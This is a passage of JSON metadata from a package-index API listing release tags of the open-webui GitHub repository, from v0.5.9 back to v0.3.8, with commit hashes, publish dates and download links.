.github.com/open-webui/open-webui/tar.gz/v0.5.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.9/manifests"},{"name":"v0.5.8","sha":"dc3b2f1f1e60dadfe6ca22e208b0f00d36f6a0f1","kind":"commit","published_at":"2025-02-05T09:16:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.8/manifests"},{"name":"v0.5.7","sha":"b72150c881955721a63ae7f4ea1b9ea293816fc1","kind":"commit","published_at":"2025-01-23T21:47:40.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.7/manifests"},{"name":"v0.5.6","sha":"9dd45ddf7c5cea09be434278edf68f3fdb23dcfd","kind":"commit","published_at":"2025-01-22T22:13:56.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.6/manifests"},{"name":"v0.5.5","sha":"568dbc545cdd7e1d08e0db7851bace82db04a418","kind":"commit","published_at":"2025-01-22T19:34:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.5/manifests"},{"name":"v0.5.4","sha":"506dc0149ca973e20768fa3d6f171afac289f606","kind":"commit","published_at":"2025-01-05T09:38:42.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.4/manifests"},{"name":"v0.5.3","sha":"4bc9904b3cd0726d3f9c3cbaeade972cf167b6c4","kind":"commit","published_at":"2024-12-31T21:41:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"e42cbf07f5a0c1fea2441e37f36f06510a2a781d","kind":"commit","published_at":"2024-12-27T07:51:49.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"2bdf99b398cf2f5ee3e15672aeecd542a5bf067d","kind":"commit","published_at":"2024-12-26T06:31:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"22132e155aa7e8522f4c79a7aae4bcfc0d7f6b0d","kind":"commit","published_at":"2024-12-25T18:39:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.0/manifests"},{"name":"v0.4.8","sha":"29a271959556743e6deb4d55a5a982983335d7ab","kind":"commit","published_at":"2024-12-07T08:42:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"c4ea31357f49d08a14c86b2bd85fdcd489512e91","kind":"commit","published_at":"2024-12-01T08:42:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"0a26c41c7b58300f37348ba580a4f0d682ca5fbd","kind":"commit","published_at":"2024-11-27T04:24:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.6/manifests"},{"name":"v0.4.5","sha":"4831c9e57e35a0619d9212b7b573e2c6a9443c8c","kind":"commit","published_at":"2024-11-26T09:55:13.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.5/manifests"},{"name":"v0.4.4","sha":"db929b5d5ec1694a80ae707a74a52a6dac9f7451","kind":"commit","published_at":"2024-11-23T03:27:41.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"c13bcfdfc9fcb9b72e516cb72c89f234511c89df","kind":"commit","published_at":"2024-11-22T06:47:45.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"6f4bc9864c9ca613fc0dae3ba1db3accfe1d1e5e","kind":"commit","published_at":"2024-11-20T20:24:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"02e94c826440162e381cad382d3ac1b0eb2b3d73","kind":"commit","published_at":"2024-11-20T04:17:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"3c334320921caaeac8ec587dc2e227e3a886177c","kind":"commit","published_at":"2024-11-19T22:28:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.0/manifests"},{"name":"v0.3.35","sha":"f1f068f458c07909247484b69bcb9a0e96b4eaeb","kind":"commit","published_at":"2024-10-26T20:17:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.35","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.35","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.35","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.35","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.35/manifests"},{"name":"v0.3.34","sha":"f10c729e3d1a1cfc82be5bf970ac3716649f472e","kind":"commit","published_at":"2024-10-26T07:44:16.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.34","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.34","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.34","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.34","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.34/manifests"},{"name":"v0.3.33","sha":"99dd7fb5a836511e02e2a3761aeab75f2e8b5687","kind":"commit","published_at":"2024-10-24T20:36:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.33","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.33/manifests"},{"name":"v0.3.32","sha":"bc29d5d3c3534c7e42eb3bdf5fa5e11e7a287aaa","kind":"commit","published_at":"2024-10-07T05:06:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.32","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.32/manifests"},{"name":"v0.3.31","sha":"c8c41e07e96140253eae07746ae24a120f9f33b7","kind":"commit","published_at":"2024-10-07T01:50:06.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.31","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.31/manifests"},{"name":"v0.3.30","sha":"7b8f923981b004d6183cd6e4f95b408b613baf9e","kind":"commit","published_at":"2024-09-26T02:13:54.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.30","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.30/manifests"},{"name":"v0.3.29","sha":"82cda6e52204f621882df696a4a26cc20ab482a0","kind":"commit","published_at":"2024-09-25T13:46:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.29","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.29/manifests"},{"name":"v0.3.28","sha":"534e4c90ca5a95d37d325b2e6a54fa36697ee736","kind":"commit","published_at":"2024-09-24T16:52:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.28","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.28/manifests"},{"name":"v0.3.27","sha":"ba20c71963963e58a012eb3d537af7c6c7a543d2","kind":"commit","published_at":"2024-09-24T16:13:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.27","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.27/manifests"},{"name":"v0.3.26","sha":"c0738cef26df70a65898bd8e14dbb4c1dc6937a4","kind":"commit","published_at":"2024-09-24T13:41:42.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.26","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.26/manifests"},{"name":"v0.3.25","sha":"019cf8199f1f4842b8f61cc3143b782433b55779","kind":"commit","published_at":"2024-09-24T12:07:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.25","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.25/manifests"},{"name":"v0.3.24","sha":"7ec72679f0c981e577b71d3f3529ce3e8839521d","kind":"commit","published_at":"2024-09-24T11:32:00.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.24","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.24/manifests"},{"name":"v0.3.23","sha":"ff8a2da751e4b64441909554965cd51c60f5332a","kind":"commit","published_at":"2024-09-21T02:55:29.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.23","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.23/manifests"},{"name":"v0.3.22","sha":"83855b713b0f211144993486ac5265d3d67bb1f8","kind":"commit","published_at":"2024-09-19T22:25:27.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.22","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.22/manifests"},{"name":"v0.3.21","sha":"50db51ebe08c018bf46acfaf55985ff998da50bc","kind":"commit","published_at":"2024-09-07T23:59:40.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.21","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.21/manifests"},{"name":"v0.3.20","sha":"e2ef36b582b06f1edef0fe84064ce4ae45fa085b","kind":"commit","published_at":"2024-09-07T04:08:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.20","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.20/manifests"},{"name":"v0.3.19","sha":"05c0423d6eba64c78fbcfeda4059e54160d2fd35","kind":"commit","published_at":"2024-09-05T18:47:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.19","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.19/manifests"},{"name":"v0.3.18","sha":"9204498420c89e347af13fe53b1d0ddcb6379dfc","kind":"commit","published_at":"2024-09-04T18:09:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.18","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.18/manifests"},{"name":"v0.3.17","sha":"a9801147b83bfeecc147708941bec1a4b29823cc","kind":"commit","published_at":"2024-09-04T16:40:16.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.17","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.17/manifests"},{"name":"v0.3.16","sha":"693dc3107a71e76e50c0f765b83eaa45acfdab87","kind":"commit","published_at":"2024-08-27T16:49:04.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.16","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.16/manifests"},{"name":"v0.3.15","sha":"847ca660018fe70dc56d29ef86eeee006684058d","kind":"commit","published_at":"2024-08-21T22:28:30.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.15","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.15/manifests"},{"name":"v0.3.14","sha":"8a620cab442ab61b1f80c21d6b68df7b020fb10c","kind":"commit","published_at":"2024-08-21T15:36:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.14","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.14/manifests"},{"name":"v0.3.13","sha":"13b0e7d64a708f69c5ce58cf0897d9951d0d16ad","kind":"commit","published_at":"2024-08-14T19:45:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.13","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.13/manifests"},{"name":"v0.3.12","sha":"c869652ef4907dd123a140d9a08a0c239e690b08","kind":"commit","published_at":"2024-08-07T13:22:04.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.12/manifests"},{"name":"v0.3.11","sha":"a58dfccb7dab4c7c42c8b4528f1d330bb1626e5f","kind":"commit","published_at":"2024-08-02T22:03:15.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"c74e7df6a04ec942af476332f4660f9d2a95fb7e","kind":"commit","published_at":"2024-07-17T15:51:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"6e843ab563c6843aac3fa5bf13056cdd1ebdbaff","kind":"commit","published_at":"2024-07-17T10:18:37.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"9bcd4ce5c0a01af68c0d2aa44554a68bb741c6